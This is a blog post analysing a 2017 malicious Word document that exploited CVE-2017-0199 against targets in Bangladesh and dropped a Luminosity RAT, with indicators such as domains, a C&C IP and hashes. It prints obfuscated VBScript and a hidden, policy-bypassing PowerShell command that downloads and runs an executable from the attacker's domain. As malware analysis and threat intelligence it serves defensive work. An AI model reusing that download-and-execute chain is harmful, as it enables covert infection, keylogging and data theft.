APT attack in Bangladesh

One of my friends from Bangladesh @rudr4_sarkar sent me this link to analyze which leads to a Word document.
http://mozillatm.com/A0Jst6jAd7CYerrqFmwb4wqDLa5XHPW_May_2017.doc

VirusTotal: https://virustotal.com/en/file/273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674/analysis/1496541543/

I figured out that this was the CVE-2017-0199 exploit. It was simple to find the payload.

b = '00000068007400740070003a002f002f006d006f007a0069006c006c00610074006d002e0063006f006d002f006c006f006100640069006e0067002e00680074006d006c00000000'

"".join("{0}".format((i+j).replace('00','').decode('hex')) for i, j in zip(b[::2], b[1::2]))

>> 'http://mozillatm.com/loading.html'

This exploit will deliver a malicious HTA file and execute it. HTA means IE, so yeah VBScript will execute nicely.

Once we visit this page we can see the obfuscated VBScript which will execute PowerShell and drop the malware on the system.

You can view the source from here: https://pastebin.com/kt3LNwiw
This part of the code seems to be interesting.

fuNctioN gJSoYXXAVqwD()

	DIM taCXnLuJDFFL

	taCXnLuJDFFL = cHRW(34) 
	 CReaTEoBJecT(HLJlzxWsFMxQ(CGUgZBJuvRsW("V1RzVENUUlRJVHBUVFQuVHNUaFRlVExUTFQ="))).expANdEnVIRoNMEnTSTrInGS(HLJlzxWsFMxQ(CGUgZBJuvRsW("JVpzWnlac1p0WmVaTVpSWm9ab1pUWiVa"))) 
	 HLJlzxWsFMxQ(CGUgZBJuvRsW("XGtTa3lrU2tUa0VrTWszazJrXGtXa2lrTmtEa29rV2tTa3Brb2tXa0Vrcmtza0hrRWtMa0xrXGt2azFrLmswa1xrcGtva3drZWtSa3NraGtFa0xrTGsua2VreGtFaw==")) 
	 ChRw(34)

	CreAtEOBJeCt(HLJlzxWsFMxQ(CGUgZBJuvRsW("d0FzQWNBckFJQXBBdEEuQXNBaEFFQWxBbEE="))).run taCXnLuJDFFL 
	 " POwerShELL.exe -EXECUtIOnPOlIcY BYPaSS -noPROfiLE -WInDoWStYlE HiDDen -EnCOdedCommAnD IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA== " , 0

eND fUnCtioN

However keep the obfuscated code aside, if we debug the code, finally the “taCXnLuJDFFL” variable will contain

""C:\Windows\SySTEM32\WiNDoWSpoWErsHELL\v1.0\poweRshELL.exE""

We could write pseudo code like this.

Set oShell = WScript.CreateObject ("WSCript.shell")
oShell.run  ""C:\Windows\SySTEM32\WiNDoWSpoWErsHELL\v1.0\poweRshELL.exE""  & " POwerShELL.exe -EXECUtIOnPOlIcY BYPaSS -noPROfiLE -WInDoWStYlE HiDDen -EnCOdedCommAnD IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA== " , 0

Once we decode the encoded command supplied to powershell we can see the malware being downloaded.

$EncodedText = "IAAoAG4ARQB3AC0AbwBCAEoARQBDAHQAIABTAHkAcwBUAEUATQAuAE4AZQBUAC4AVwBlAGIAYwBMAGkAZQBOAFQAKQAuAEQAbwB3AG4ATABPAEEARABGAGkATABFACgAIAAdIGgAdAB0AHAAOgAvAC8AbQBvAHoAaQBsAGwAYQB0AG0ALgBjAG8AbQAvAGwAbwBhAGQAaQBuAGcALgBlAHgAZQAdICAALAAgAB0gJABFAG4AdgA6AFQATQBQAFwAQwBoAHIAbwBtAGUAdABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwBUAEEAcgBUACAAHSAkAEUAbgB2ADoAdABNAFAAXABDAGgAcgBvAG0AZQB0AG0ALgBlAHgAZQAdIA=="
$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
Write-Host $DecodedText

This is a PowerShell one-liner to drop the malware from http://mozillatm.com/loading.exe and save it to the %TMP% folder as “Chrometm.exe”

(nEw-oBJECt SysTEM.NeT.WebcLieNT).DownLOADFiLE( ”http://mozillatm.com/loading.exe” , ”$Env:TMP\Chrometm.exe” ) ; sTArT ”$Env:tMP\Chrometm.exe”

This malware is written in Visual Basic and highly obfuscated. I submitted this sample to Malwr.com and you can view the complete analysis here. Seems like the attackers are using Luminosity RAT.

https://malwr.com/analysis/YmJiNTEwYzE5OWFkNDZjYmFiNTY0OWZhMzA5YzgyOGY/

After running it will copy itself inside the “program files” folder as “Mozillatm.exe”. We can check the autorun entries. There’s another exe as “Mozillatms.exe” inside the “system32” folder, notice the ‘s’. It seemed to be a backup.

The copy inside “Program Files”.

However, I noticed something, in 64-bit machines the malware will copy itself into the “C:\windows\SysWow64” folder. So this autorun key won’t work under 64-bit machines, meaning the backup malware will fail under 64-bit.

“Mozillatm.exe” will be our malicious executable running.

This malware will communicate with the C&C, IP address is 162.248.92.28:131106

This malware will store screenshots, keystroke logs and send them to the C&C server. They are located inside %USERPROFILE%\AppData\Roaming\Mozillatms

Keystroke logs can be found inside the “logs” folder.

The screenshot data is compressed using the deflate algorithm. This happens when you compress twice. But however can be decompressed easily.

I wrote a simple tool to perform compression and decompression using the deflate algorithm.

Deflate.exe “6.51 PM” output.jpg -d

This is an example screenshot taken by the malware.

For curiosity I had a look around the C&C IP address 162.248.92.28 and found out using Squid proxy.

However, it uses HTTP authentication.

With a bit of Googling, I found out that these domains too are variants of this attack using the same malware.

  • Bd2bd.com
  • Pc-net.org
  • Bd-pc.com
  • Registerbd.com

You can find more details by beetles.io on http://blog.beetles.io/2017/05/29/apt-rat-1/ and https://blog.beetles.io/2017/06/01/operation-brightroar-uncovering-more-attack-pattern/

The samples I’ve analyzed.

Filename: loading.exe
SHA256: 9865ccfe4dd0c893c88d24168425933e5663ee8861a3b360e1b10e63769f5392
https://virustotal.com/en/file/9865ccfe4dd0c893c88d24168425933e5663ee8861a3b360e1b10e63769f5392/analysis/1496541573/
https://malwr.com/analysis/YmJiNTEwYzE5OWFkNDZjYmFiNTY0OWZhMzA5YzgyOGY/

Filename: A0Jst6jAd7CYerrqFmwb4wqDLa5XHPW_May_2017.doc
SHA256: 273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674
https://virustotal.com/en/file/273b0fc627daefd0fbae209e5fa1ea619bfb177a1b0ae2d55a606cf2c6ec2674/analysis/1496541543/

Advertisements

5 thoughts on “APT attack in Bangladesh

  1. Good article Malith. The malware has added itself in the task and queries to 192.168.0.142? Any thought on this?

  2. Pingback: IT Security Weekend Catch Up – June 11, 2017 – BadCyber

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s